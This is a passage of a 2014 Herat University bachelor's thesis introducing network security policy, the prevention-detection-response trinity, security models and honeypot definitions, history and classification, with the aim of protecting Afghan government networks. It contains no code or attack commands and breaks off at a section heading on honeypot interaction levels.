Designing Countermeasures For Tomorrows Threats : Documentation

Islamic Republic of Afghanistan

Ministry of Higher Education

Herat University

Computer Science Faculty

Department of Communication & Operating System

Designing Countermeasures For Tomorrows Threats

By: Darwish Ahmad Herati

Supervisor: M.Sc. Mrs. Maria Sawabi Nezehat

December 8, 2014

Contents

Content iii

abstract viii

Acknowledgement ix

1 INTRODUCTION 1

1.1 Problem Statement . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

1.2 Motivation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.3 Goal . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

1.4 Thesis Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

2 COMPUTER AND NETWORK SECURITY 6

2.1 Network Security Policy . . . . . . . . . . . . . . . . . . . . . . . . . 6

2.2 Importance of Network Security Policy . . . . . . . . . . . . . . . . . 7

2.3 Elements of Security Policy . . . . . . . . . . . . . . . . . . . . . . . 7

2.4 Implementing Network Security Policy . . . . . . . . . . . . . . . . . 8

2.5 The Security Trinity . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.1 Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.2 Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.5.3 Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

2.6 The Security Models . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.6.1 Security By Obscurity Model . . . . . . . . . . . . . . . . . . 10

i

2.6.2 The Perimeter Defense Model . . . . . . . . . . . . . . . . . . 10

2.6.3 The Defense In Depth Model . . . . . . . . . . . . . . . . . . 10

2.7 The Zero Concept . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10

2.8 Network Security Terminologies . . . . . . . . . . . . . . . . . . . . . 11

3 HONEYPOT SYSTEMS 13

3.1 Definition of Honeypot System . . . . . . . . . . . . . . . . . . . . . . 13

3.2 History of Honeypot System . . . . . . . . . . . . . . . . . . . . . . . 14

3.3 Classification of Honeypot Systems . . . . . . . . . . . . . . . . . . . 14

3.3.1 Classifying Honeypot Systems By Purpose . . . . . . . . . . . 14

3.3.2 Classifying Honeypot Systems by Level of Interaction . . . . . 16

3.4 Honeypot Systems Policy . . . . . . . . . . . . . . . . . . . . . . . . . 17

3.5 The Value of Honeypot Systems . . . . . . . . . . . . . . . . . . . . . 17

4 HONEYNET SYSTEMS 19

4.1 Difinition of Honeynet Systems . . . . . . . . . . . . . . . . . . . . . 19

4.2 Overview of Honeynet Systems . . . . . . . . . . . . . . . . . . . . . 19

4.3 Countries That Use Honeynet Systems . . . . . . . . . . . . . . . . . 20

4.3.1 IRAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

4.3.2 PAKISTAN . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

4.3.3 INDIA . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

4.3.4 SAUDI ARABIA . . . . . . . . . . . . . . . . . . . . . . . . . 23

4.3.5 GERMANY . . . . . . . . . . . . . . . . . . . . . . . . . . . . 24

4.3.6 POLISH . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

4.3.7 UK . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26

4.4 Security Communities That Use Honeynet Systems . . . . . . . . . . 27

4.4.1 THE HONEYNET PROJECT . . . . . . . . . . . . . . . . . . 27

4.4.2 THE NORSE . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

4.4.3 THE FIREEYE . . . . . . . . . . . . . . . . . . . . . . . . . . 30

4.4.4 THE GLOBAL BOTNET THREAT ACTIVITY . . . . . . . 31

4.4.5 THE WORLD MAP . . . . . . . . . . . . . . . . . . . . . . . 32

4.4.6 THE KASPERSKY MAP . . . . . . . . . . . . . . . . . . . . 33

ii

4.5 Honeynet Systems For Afghanistan . . . . . . . . . . . . . . . . . . . 34

5 HONEYPOT AND HONEYNET SYSTEMS TECHNOLOGIES 38

5.1 Honeyd (Honey Daemon) . . . . . . . . . . . . . . . . . . . . . . . . . 38

5.1.1 Value of Honeyd . . . . . . . . . . . . . . . . . . . . . . . . . 39

5.1.2 How Honeyd Works . . . . . . . . . . . . . . . . . . . . . . . . 40

5.1.3 Interacting With Attackers . . . . . . . . . . . . . . . . . . . . 40

5.2 Kippo . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41

5.2.1 Features of Kippo . . . . . . . . . . . . . . . . . . . . . . . . . 42

5.2.2 How Kippo Works . . . . . . . . . . . . . . . . . . . . . . . . 42

5.3 Conpot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.4 Dionaea . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.5 HoneyWall . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

5.6 HoneyBot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

5.7 BackOfficer Friendly . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

5.8 The Value of BOF . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

6 DESIGNING COUNTERMEASURES FOR TOMORROWS THREATS 47

6.1 Implementation of Honeyd (Honey Daemon) Technology . . . . . . . 48

6.2 Implementation of Kippo Technology . . . . . . . . . . . . . . . . . . 56

Conclusion 68

Further Research 69

Bibliography 71

iii

List of Figures

1.1 The Goal Diagram . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4

2.1 The Security Trinity . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

3.1 The Honeypot Classification Diagram . . . . . . . . . . . . . . . . . . 15

4.1 The Iran Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . 21

4.2 The Pakistan Honeynet System . . . . . . . . . . . . . . . . . . . . . 22

4.3 India Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . . . 23

4.4 Saudi Arabia Honeynet System . . . . . . . . . . . . . . . . . . . . . 24

4.5 German Honeynet System . . . . . . . . . . . . . . . . . . . . . . . . 25

4.6 The Polish Honeynet System . . . . . . . . . . . . . . . . . . . . . . . 26

4.7 The United Kingdom Honeynet System . . . . . . . . . . . . . . . . . 27

4.8 The Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . . . . 29

4.9 The Norse Honeynet Project . . . . . . . . . . . . . . . . . . . . . . . 30

4.10 The FireEye Honeynet System . . . . . . . . . . . . . . . . . . . . . . 31

4.11 The Global Honenet System . . . . . . . . . . . . . . . . . . . . . . . 32

4.12 The WorldMap3 Honeynet System . . . . . . . . . . . . . . . . . . . 33

4.13 The WorldMap3 Honeynet System . . . . . . . . . . . . . . . . . . . 34

4.14 The Afghanistan Map . . . . . . . . . . . . . . . . . . . . . . . . . . 35

4.15 The Afghanistan Ministries . . . . . . . . . . . . . . . . . . . . . . . 36

4.16 The Best Solution For Afghanistan . . . . . . . . . . . . . . . . . . . 37

6.1 The Used Operating Systems . . . . . . . . . . . . . . . . . . . . . . 48

iv

6.2 The Installation of Honeyd Technology . . . . . . . . . . . . . . . . . 48

6.3 The List of Honeypot Folder . . . . . . . . . . . . . . . . . . . . . . . 49

6.4 Making of a Template For Emulation . . . . . . . . . . . . . . . . . . 49

6.5 Making of a Router Template For Emulation . . . . . . . . . . . . . . 49

6.6 The Scripts For Service Emulation of Honeyd Technology . . . . . . . 50

6.7 Running of the Honeyd Technology . . . . . . . . . . . . . . . . . . . 50

6.8 Pinging the Emulated Systems . . . . . . . . . . . . . . . . . . . . . . 51

6.9 Capturing the Attackers Interaction . . . . . . . . . . . . . . . . . . . 51

6.10 The nmap of Emulated System for Ports Vulnerabilities . . . . . . . . 52

6.11 Running of the Honeyd2MySQL For Entering Captured Data into a

MySQL Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52

6.12 The Process of Entering Gathered Informations to the MySQL Database 53

6.13 The list of files of Honeyd-VIZ Web Interface . . . . . . . . . . . . . . 53

6.14 The Web Interface Configuration File . . . . . . . . . . . . . . . . . . 54

6.15 Generating the Honeyd-VIZ Graph . . . . . . . . . . . . . . . . . . . 54

6.16 The Geographical Location of the Attackers . . . . . . . . . . . . . . 55

6.17 The Various Graphs For Different Issues . . . . . . . . . . . . . . . . 55

6.18 The List of Files and Running of Kippo Technology . . . . . . . . . . 56

6.19 The Valid Users Database . . . . . . . . . . . . . . . . . . . . . . . . 57

6.20 Start Attacking to the Kippo Technology . . . . . . . . . . . . . . . . 57

6.21 Live Monitoring Log File of Kippo Techonology . . . . . . . . . . . . 58

6.22 Live Monitoring Log file of Kippo Technology . . . . . . . . . . . . . 58

6.23 Attempting to Connect With Wrong Passwords . . . . . . . . . . . . 59

6.24 Attempting to Connect With Correct Passwords . . . . . . . . . . . . 59

6.25 After Entering Interacting With Emulated System Adding New Users 60

6.26 Doing More Interactions Making Files and Folders . . . . . . . . . . . 60

6.27 And More Interaction Monitoring Network Interfaces . . . . . . . . . 61

6.28 Monitoring Kippo Technology Log File Real Time . . . . . . . . . . . 61

6.29 Running the Kipp2MySQL Script for Entering Gathered Information

to the Database . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62

6.30 Entering Gathered Information to The Databse . . . . . . . . . . . . 62

v

6.31 List of Web Interface Files and Configuation File . . . . . . . . . . . 63

6.32 Web Interface Configuration File . . . . . . . . . . . . . . . . . . . . 63

6.33 Generating Graphs From Gathered Information . . . . . . . . . . . . 64

6.34 Various Graphs for Different Issues . . . . . . . . . . . . . . . . . . . 64

6.35 The Commands that the Attackers Used . . . . . . . . . . . . . . . . 65

6.36 The Kippo Play Log . . . . . . . . . . . . . . . . . . . . . . . . . . . 65

6.37 The Kippo Play Log . . . . . . . . . . . . . . . . . . . . . . . . . . . 66

6.38 The Geographical Location of the Attackers . . . . . . . . . . . . . . 66

6.39 The Graph Gallery of Kipp Technology . . . . . . . . . . . . . . . . . 67

vi

Designing Countermeasures For Tomorrows

Threats

Darwish Ahmad Herati

Abstract

Internet and network security is the most important and top priority issues for

almost all types of organizations, for instance, military divisions, ministries, banks,

other public and private sectors, and even to everyone who concerns it.

These organizations may use security mechanisms to protect their assets safe against

evil and attackers, but most of the security countermeasures that they use are based

on known attacks, threats and vulnerabilities. They hardly pay attention to protect

their assets against unknown and new types of attacks, threats and vulnerabilities.

Most of the organizations faced to challenges the new types of unknown attacks and

threats.

This research paper’s main aim is to focus and study approaches and solutions

against the unknown attacks and threats, and therefore, titled Designing Counter-

measures for Tomorrows Threats to make the organizations enable to detect new

types attacks, threats or vulnerabilities before they damage their assets or systems.

In addition, the outcome of this research paper will give the chance to the or-

ganizations to learn who is attacking their systems, how they are being attacked,

and what the attackers are trying to achieve. The concepts that this research paper

(thesis) used for Designing Countermeasures for Tomorrows Threats are Honeypot

and Honeynet systems.

Honeypot and Honeynet Systems are one of the most interesting and well-known

concepts for all the security professionals to know their enemies and identify their

weakness. Worth mentioning that most of the countries i.e. Iran, Pakistan, India,

Saudi Arabia, Germany and Polish are using these concepts to protect their internal

vii

networks and assets against the attackers. Besides, there are a great number of

security organizations and communities that use these concepts for research to learn

and educate public about new types of attacks, threats and vulnerabilities naming

Honeynet Project, Norse, FireEye, WorldMap and Global Botnet Threat Activity.

This thesis implemented most of the existed-based technologies on the concept of

Honeypot and Honeynet systems both open source and close source. Finally suggest

and recommend the best solution for Afghanistan to protect its internal networks

especially important organizations like Ministry of Interior and other ministries and

sectors.

SUPERVISOR : M.C.S. : M. Sawaby Nezhat

viii

Acknowledgement

First of all I would like to thanks my supervisor M.Sc. Mrs. Maria Sawaby

Nezhat for the guidance and technical support. Thanks for her to make it possible

for successful completion of this thesis. Thesis writing is a difficult challenge but I

finished it with her help.

Secondly I would like to thanks Mr.Abdul Rahman Vakili the one who persuade

me for researching on this intersting subject for my bachelor thesis. I would like to

appreciate him for his time to time guidance about project directions.

Thirdly I would like to say thanks to my best friend, teacher and old brother M.Sc.

Mr.Abdul Rahman Sherzad lecturer at Computer Science Faculty at University of

Herat. He is the one who teach me how to think and change my whole life.

In addition I would like to thank to my dear friends especially Hasibullah Ansari

for encouraging me to work on this thesis with passion until completed.

Lastly I wish to take this opportunity to express my deepest thanks to my dear-

est parent and brothers for their unconditional love, support and encouragement

throughout the researches. I would also like to convey thanks to my lecturers, pro-

fessors, classmates and friends.

Their academic enlightenment made my achievements possible during the four years

bachelor degree.

Darwish Ahmad Herati

December, 2014

Herat, Afghanistan

ix

Chapter 1INTRODUCTION

Global communications getting more important every day. The level of ma-licious activities and computer crimes are increasing rapidly. Countermeasures arebuilt and developed to detect and prevent these kinds of illegal activities but most ofthese countermeasures only detect and prevent from known attacks and known mali-cious activities. By knowing the attacks strategies countermeasures can be improvedand also vulnerabilities can be fixed. There are a great number of security technolo-gies that are available today commercial or even open source solutions. But none ofthese technologies singly can protect all of our security goals in an organization.

Security professionals are looking for more advanced technologies that are effectivein detecting and preventing security breaches. As a network security administratoryou have to design efficient, extreme and sometimes diverse measures protectionmechanisms and be prepared to protect your assets on your network. Despite havingall these precautions still attacks happen and the computer security fails to securethe computer networks in case of new types of attacks.

In this thesis that is obvious from its title that is designing countermeasures fortomorrow’s threats the idea is about to monitoring the activities of attackers themethodology adopted is to deceive them by giving them some real or emulated setof services on a system that appears to be legitimate. The attacker’s activities arethen logged and monitored to achieve their employed tactics. This idea is going tobe implemented using honeypot and honeynet systems. Organizations like banks,military, airport, transport and research organizations use for detecting new typesof technologies and attacks.

Honeypot and honeynet systems are very different from the most of traditionalsecurity mechanisms. It is a system whose value lies in being probed, attacked andor compromised to gather as much information as possible this is the one main goal ofhoneypot and honeynet systems. Generally such kind of information gathering mustbe done silently without alarming the attackers. Then all the gathered informationleads us to the advantages on defending and can be used to prevent the attacks.Also there are many other definitions for honeypot and honeynet systems accordingthe use of these technologies. Honeypot and honeynet systems are primarily an

1


instrument for information gathering and learning. Because it records all the actionsand interactions with attackers. Since honeypot and honeynet systems don’t provideany legitimate services all the activities are unauthorized and malicious.

This thesis explain what a honeypot or honeynet system is, how it works, andthe different values that this unique technology can have. Then go into the detailson different types of honeypot and honeynet technologies and show you what a realattack looks like to a honeypot or honeynet system. The main goal of this thesis is notto just give you an understanding of honeypot or honeynet systems and architecturebut to provide you with skill and experience to deploy the best honeypot systemsolutions for you own organizations. Inside the thesis you will see the usages ofhoneypot and honeynet systems where using it. Knowledge and skills are the twoimportant keys to defence with new types of attacks or tomorrow’s threats by usingthe honeypot or honeynet system track the attackers and learn about them.

1.1 Problem Statement

About the problems that can be solved in this thesis the exact point will bementioned in a single paragraph. We need to learn how we are being attacked. Weneed to learn who is attacking us. We need to learn what the attackers trying toachieve. We need to learn how to defend against attackers. How to build a securitymechanism that waits for attacks. By tracing the attacker’s activities we can learna lot about them about their locations, their technologies and what they want fromattacking to our networks. Finding the solutions for all these questions and thinkabout that what can be done to make our network more secure.

As discussed before most of the countries of the world use from these concepts toprotect their internal networks against unknown and new types of attacks, threatsand vulnerabilities such as Iran, Pakistan, India, Saudia Arabia, Polish and Germany.Also their are many organizations used from these concept to learn about new typesof attacks, threats and vulnerabilities and share it to the public such as HoneynetProject, Norse, Global Botnet, World Map and the Kaspresky.

Securing the internal network of Afghanistan is an important issue. Speciallyin Afghanistan ministries, organizations, airports, universities and banks. Once asystem is attacked we need to learn who is attacking us. We need to learn how weare being attacked. We need to learn what the attackers trying to achieve. We needto learn how to defend against the attackers. In here everyone can learn these thingsby implementing Honeypot and Honeynet Systems to their networks. This thesisgoing to suggest the best solution for Afghanistan’s internal networks specially forAfghanistan ministries such as ministry of Interior.

Chapter 1 2


1.2 Motivation

First of all I am interested in this field of study which is network security. Themotivation for choosing this subject for the thesis was that honeypot and honeynetsystems are seems very interesting technologies for securing the computer networksand its extensive uses of it all over the world. There are many other motivations towork on this thesis such as Securing Afghanistan internal networks. Recognize theenemies of Afghanistan and their actions on internal networks. To show our ability tothe others that we can do everything at its highest level knowledge. Defending againstthe attackers. Learning new types of attacks and its tactics after implementing ofthis concept.

For being aware from tomorrows threats which is the title of thesis and how toprotect our organization from attacks. By using it for learning and develop yourknowledge about network security specially in case of unknown and new types ofattacks, threats and vulnerabilities. Finally laugh to the attackers was also one ofthe motivations among many of them

1.3 Goal

The goal of this thesis is to find the solution for the problems that came to problemstatement section. To achieve this goal it has been divided to some small parts togo toward the main goal step by step. This division is shown in figure 1.1.

Chapter 1 3


Figure 1.1: The Goal Diagram

As shown in figure 1.1 the main goal divided into some small parts. It is nice to havea brief information about each part:

• Idea: The first part was the idea which was the title and what concept to use.The title was Designing Countermeasures For Tomorrows Threats and the conceptwas Honeypot and Honeynet Systems.

• Information Gathering: The second part was gathering information frombooks, thesis, articles and other sites on internet.

• Today’s Technologies: Countries and Organizations that are using from theseconcepts to protect their internal networks or using for research.

• Implementation: Focusing on open source and close source technologies thatexist at the time of writing this thesis.

• Best Solution: Finally presenting the best solution for problems after analysingthe results of all the previous parts.

How a network security administrator can obtain information and track the at-tackers. Explaining and coming up with some discussions regarding what should be

Chapter 1 4


done and what should be done with having respect to the laws and having someopinions and suggestions based on subject while looking for the answers of securityproblems.

1.4 Thesis Structure

This thesis is going to start by having an introduction to the thesis at first andgo on to achieve the main goal which is designing countermeasures for tomorrowsthreats in several chapters.

• Introduction ChapterThat covers problem description, motivation, goal and restriction. Going forward tothe next chapter.

• Network Security ChapterSecond chapter explaining some requirements of the thesis generally about computerand network security. Discussing network security policy, elements of network secu-rity policy, implementing network security policy, the security trinity, the securitymodels and network security terminologies.

• Honeypot Systems ChapterThe third chapter focus on the main subject that the thesis is about. Honeypotsystems. Definition of honeypot systems, the history of honeypot systems, honeypotsystems classifications, honeypot system policy and the value of honeypot systems.

• Honeynet Systems ChapterForth chapter discuss about honeynet systems.

• Honeypot and Honeynet Technologies ChapterThe Fifth chapter discuss about honeypot and honeynet technologies discuss aboutsome important honeypot and honeynet system technologies that are in use today.

• Designing Countermeasures For Tomorrows ThreatsThe last chapter or chapter six is about the practical implementation of the thesis.

Chapter 1 5

Chapter 2COMPUTER AND NETWORKSECURITY

The primary goal of the computer and network security is to protecting theorganizations assets. Assets here doesn’t mean physical devices or software it meansthe information that is inside the computer and network. Security is vital issuefor gaining competitive advantages for organizations. For example a bank that hasinternet banking services must be completely secure against attackers for ensuring itscustomers otherwise will loose its customer. This mean that everything in a networkmust be secured against internal and external threats.

Also information security cover some other areas too like accidents, natural dis-asters and other unintentional actions that results information corruption or loss.Having its special security policy for these issues like backup and disaster recovery.Identifying what you are trying to protect and determine you are trying to protectfrom. Determine the threats. Trying to implement an efficient and cost effectivecountermeasures for protecting your assets. Having awareness about threat andweaknesses of your network all the time. Once you face a problem try to solve it asfast as it happened.

This thesis is also focuses on a single security subject for designing countermeasuresfor the threats using honeypot systems. Reports and statistics of organizationshistories related to computer and network security are ignored in this thesis. Becauseof focusing on important and useful information on this thesis. Having a short anduseful information about fundamental of computer and network security is the bestway to achieve the goals of this thesis.

2.1 Network Security Policy

Before starting the main topic the reason of discussing this title should be cleaned.The important reason for this issue was the importance of network security policy,benifits, advantages in a computer network. For implementing security mechanismsit is needed to determine their policies before. In here the main goal of this thesis is

6


a requirement to have a brief information about network security policy, importanceof network security policy, elements of security policy and implementing of a networksecurity policy.

Network security policy defines a structure for protecting our assets that maybeshared or not. All the rules, access limitations for users and accessing the assetsare covered and defined under the network security policies. The network securitypolicies are the source of information for security administrators to setup, audit andtroubleshoot when it face to problems. Everything about the security policies arediscussed in detail about what policy to implement and how to implement, informa-tion about the users, network administrators, network managers, auditors of networkand the general manager who has the ownership of the network and resources. Thenext section discuss about elements of a network security policy.[9]

2.2 Importance of Network Security Policy

Some of the benifits of network security policy are minimizing the risk of dataloss, protecting from malicious external and internal users, protecting assets fromunauthorized (access, modification, disclosure and destruction) and etcetera.

• Network Protection: Network security policy is important for network pro-tection to have a trusted secure environment.

• Network Extension: Network security policy is important for network exten-sion to keep save connectivity and enlarging the network.

• Network Acceleration: Network security policy is important for network ac-celeration which gives us the solution for manage, control and optimize internettraffic and content running at maximum availability and at faster speeds.

• Network Management: Network security policy is important for managementof the networks. The ability to manage everything deployed in a network and en-suring that they operate at maximum effectivenesss. In a centralised managementeverything done remotely upgrade, backup, restore, monitoring operating systems,firewall, intrusion detection systems all from one location.

2.3 Elements of Security Policy

Lets have a brief information about important elements of network security policy.A privacy policy that defines the reasonable expectations regarding to privacy suchas monitoring e-mails, logging of keystrokes and access to the user’s files. Accesspolicy that defines the privileges and access rights to assets. Accountability policydefines the responsibilities of users, operation stuff and administrators.[11]

Authentication policy defines the effective trust through strong password policy.

Chapter 2 7


Availability policy defines the user’s expectations about access and availabilityof resources.

Information technology & network maintenance policy defines how bothinternal and external maintenance people are allowed to work and access technology.Discussion about policies that are needed while controling system remotely.

Violation reporting policy defines violations like internal, external, privacy andsecurity everything must be reported.

Supporting information policy provides users, staff and management withcontacts. Guide others about violations and new policies related to them.

There are many other elements in network security policy. Each of the aboveelement of security policy needs an individual chapter to discuss about them. Thisthesis is not the place to explain them in detail.

2.4 Implementing Network Security Policy

After definition of network security policy and its elements having a short informa-tion about implementing network security policy is necessary. Because implementinga security policy is not a simple matter. Different counteries have different laws re-garding to the usages of honeypot systems and the security administrators who aregoing to implement the honeypot systems and information capturing that you shouldknow about it.

Honeypot systems covers technical and nontechnical aspects. You must understandthat it is challengeable to find the correct equipment that can work together meansto have compatibility to work with themselves and implement the security policycorrectly to come up with the design that works for all parties. There are somecritical points that is necessary to keep in mind before implementing a securitypolicy. These issues can help you in implementation of security policies.[17]

All the members of the organization including users and managers must be agreeabout the security policy you are going to implement.

Train and educate the users about why security is important and you must be surethat everyone understand the reasons behind the security policy and what is goingto be implemented. This process must be continuously for old and new users.

Having security is not free and implementing security policy is expensive. It isimportant to educate the management about the security policies.

You have to clearly define responsibilities of the various people for the variousparts of the network and their reporting relationships.

Chapter 2 8


2.5 The Security Trinity

Prevention, Detection and Response are the three roots of computer and networksecurity. And when organizations want to implement security policies the securitytrinity must be a foundation for all the security policies that is going to develop inthat organization. Figure 2.1 shows the security trinity.

Figure 2.1: The Security Trinity

2.5.1 Prevention

Security trinity was the foundation of computer, the network security prevention isthe foundation of security trinity. Prevention means that design countermeasures toprevent from abusing of vulnerabilities. At the first step organization must emphasison prevention rather than detection or response. Because it is easy, more efficientand much more cost effective to prevent a security breach than to detect or responseto it. Remember that is impossible to prevent all the security vulnerabilities. Butyou can design a strong prevention mechanism that discourage the attackers to goto another easy vulnerable system.[6]

2.5.2 Detection

After designing preventative measures for the organization and unfortunately thatfails. It is very important to detect them as soon as possible. If we detect theproblem immediately it is easier to to find a solution for it.[6]

2.5.3 Response

If prevention and detection mechanisms failed the organization need to develop aplan for the response to the security breach. This plan must be documented anddefine that who is responsible for what to do in what level of response.[6]

Chapter 2 9


2.6 The Security Models

Implementing a combination of different security models together to achieve secu-rity. There are three basic security models which is security by obscurity model, theperimeter defense and the defense in depth model. Let’s have a brief explanationthem.

2.6.1 Security By Obscurity Model

This model focus on hiding of the network. When we hide our network it wouldn’tbe a subject to attack. But the problem with this concept that is not work for longterm because once detected the network will become completely vulnerable and itbecame a good opportunity for the attackers to attack to it.[6]

2.6.2 The Perimeter Defense Model

This model focus on border of our network. Mean it is safe from outside attackersbut the problem with this concept is that it can’t prevent from the inside attacks orattackers. By using the firewalls can prevent the borders from outside attacks butdo nothing about inside attack. So it vulnerable from inside.[6]

2.6.3 The Defense In Depth Model

In this model each system defend itself. Mostly used from this model. In thisconcept the internal network is safe but about the around or borders it is not secure.Because these reasons usually when organization determine their security policiesthey combine these models together to have achieve security.[6]

2.7 The Zero Concept

There are some concepts in network security by the names of Zero-Day, Zero-HourAttack,Threat and vulnerabilities. In this thesis all of these concepts come into oneconcept called Zero concept. There are many definitions for this concept but ingeneral all of them are the same.[12] , [5] , [18]

Zero-Day Attacks: Attacks that the target publicly known but still unpatchedvulnerabilities. Another definition that this term is defined as software or hardwarevulnerabilities that have been expoited by the attackers where there is no priorknowledge of the flaw in the general information security community and thereforeno vendor of the software or hardware fix or software patch available for it.[4] ,[7] ,[16]

Chapter 2 10


2.8 Network Security Terminologies

It is necessary to have a brief information about terminologies related to networksecurity before dive into our main subject. Because these terms are the basis forour discussion about network security. Let’s start the brief explanation about theseterms.

• ThreatAnything that interrupt the operation, functioning, integrity or availability of acomputer or network is called threat. About the different types of threats intentionalthreats like someone directly attacks to systems. Unintentional threats like stupidity.Finally natural threats like storm, earthquake, flood and fire. Each of these threatcan damage the computer network.

• VulnerabilityVulnerability is a weakness in the design, configuration or implementation of a com-puter or network of computers. Having a poor design of network with security holesmake our computer network vulnerable to attack. Also having a poor implementa-tion configuring the systems incorrectly make the systems vulnerable to attack. Poormanagement cause the network being vulnerable and make good opportunities forthe attackers. Everything related to the network security of an organization mustbe documented.

Different kinds of vulnerabilities are exist like physical vulnerabilities place yourimportant physical equipment in save places for example routers, switches and serversin server rooms and special authorized should go there. Hardware and software vul-nerabilities, media vulnerabilities physical devices such as hard drive can be stolen.Human vulnerabilities carelessness, craziness and stupidity and anger are the vul-nerabilities to the computer or network.[8]

• CountermeasuresTechniques and method used to defend against attacks, threats or vulnerabilities.

• IdentificationA simple process for identifying one identity to the system like logon ID.

• AuthenticationThe process that check or proof that you are what you claim to be using usernameand password.

• AuthorizationAlso called access control that refers to the ability to level of access.

• AvailabilityHaving uninterrupted access to the information in the system or computer network.

Chapter 2 11


• ConfidentialityPreventing from unauthorized access of information. Also called secrecy and privacylike encryption.

• IntegrityProtect and accuracy of information from unauthorized access and modification.

Chapter 2 12

Chapter 3HONEYPOT SYSTEMS

Now lets start discussing about the issues that the thesis is about. As youknow the thesis is about designing countermeasures for tomorrows threats. Fordesigning these countermeasures to detect and prevent from new or unknown threatsand attacks the concept of honeypot and honeynet systems are used. This chaptermainly focus on honeypot systems, its definition, history, classification, policies, itsvalue, advantages and disadvantages of honeypot systems. The next chapter willdiscuss about honeynet systems and it will be discussed in detail on its own chapter.

3.1 Definition of Honeypot System

In security community everyone has his or her own definition of a honeypot system.Some people think that a honeypot is a tool for deception while others consider itas a weapon to lure hackers and some people believe it is another kind of intrusiondetection system. Also there are some other people believe that a honeypot emulatevulnerabilities, others see it as simply a jail. Some view a honeypot as controlledproduction system that attackers can break into. These various viewpoints havecaused a lot of misunderstanding about what a honeypot is and thus its value.[14],[15]

The definition of honeypot according to this thesis is as follows. A honeypot isa security resource whose value lies in being probed, attacked, or compromised andused as a countermeasure for the new types of threats and attacks.

Designing countermeasures for tomorrow’s threats focus on implementing the con-cept of honeypot system we can build a virtual environment, that whenever anattacker by using new strategies and technologies to attack our network that com-munication routed to the virtual environment made by the honeypot system andstart interacting with attacker. The honeypot system capture everything that theattacker does with the system. Because we need to learn how we are being attacked,who is attacking us, what the attackers try to achieve and we need to learn how todefend to achieve these we use honeypot systems.

13


It’s different from the other technologies which use in security. The strongestreason is that most of security technologies that are in use today focus on specificproblems for example firewalls are used to protect an organization by controllingwhat traffic can flow where. They are used as an access control device. Firewalls aredeployed around an organization’s perimeter to block unauthorized activities.

Network intrusion detection systems are used to detect attacks by monitoringsystem or network activities. They are used to identify unauthorized activity. Thebig difference is in that honeypot systems are not limited to solving specific problems.Honeypot systems are highly flexible technologies and can be applied to a variety ofdifferent situations as a countermeasure technology for unknown and new types ofattacks.

3.2 History of Honeypot System

It’s nice to have a brief useful information about unique history of honeypot.The concepts of honeypot have been around for more than two decades. During1990/1991 documented first works on honeypot concept. Later in 1997 first solutionsbecome available to the security community.1998 begin development on CyberCopSting one of the first commercial honeypot sold to the public.[15]

CyberCop Sting introduce the concept of multiple virtual systems on a singlehoneypot. During 1998 BackOfficer Friendly a free, simple to use windows basedhoneypot was introduced. In 1999 publication of ”know your enemy” awarenessabout honeypot technologies. In 2000/2001 used for detecting new attacks andthreats in most organizations.[15]

In 2002 a honeypot was used to detect and capture new and unknown attacks.Now many honeypot technologies are developed, introduced and implemented. Thiswas a short and useful history of honeypot systems.[15]

3.3 Classification of Honeypot Systems

Honeypot systems are classified according to the purpose and level of interaction.According to the purpose it has two types research honeypot systems and productionhoneypot systems. According to the level of interaction divided to three categoriesLow-level interaction, Medium-level interaction and High-level interaction honeypotsystems.

3.3.1 Classifying Honeypot Systems By Purpose

Before Honeypot systems are classified into two general categories and this sec-tion discusses the classification according to the purpose. It is divided into twosubcategories Research honeypot systems and Production honeypot system. At firstResearch honeypot systems as shown in figure 3.1 .

Chapter 3 14


Figure 3.1: The Honeypot Classification Diagram

Research Honeypot Systems

It’s obvious from its title that research honeypot systems are used for gatheringinformation for research issues in general they are used to gather critical informationabout who is the threat, why do they attack, how do they attack, what are theirtools and technologies. This type of honeypot systems are the most complex typeof honeypot systems. Designing a research honeypot system using real systems andservices need more time and a lot of resources because attacker interact with realsystem and services. Usually used in development countries the place that Blackhathacker’s communities are exist.

For interacting with attackers to gather information about identity, tools, technolo-gies and how they develop and what they want and etc. These research honeypotsystems are used mostly, also most of the companies which their focus points aresecurity they used these type of honeypot systems to research and gather criticalinformation about new technologies and unknown types of attacks. To design coun-termeasures for them and also used in military, government, universities and placeswhere the assets are the most important issues.

Production Honeypot Systems

Production honeypot systems are used in organizations to protect their assetsfrom new and unknown attacks. For example an organization has a database serverthis organization can use a honeypot to emulate a database server and capture theinteraction of the attackers to it.

Chapter 3 15


This type of honeypot simply log the interaction of attacker to that services whichemulate by the honeypot system. To implement and design a production honeypotsystem doesn’t need lots of resources, time and easy to implement against researchhoneypot system. Production honeypot help enormously to prevent the attacksand reduce vulnerabilities on real system. Finally the production honeypot systemscollect a small amounts of data which has high value for analysing.

3.3.2 Classifying Honeypot Systems by Level of Interaction

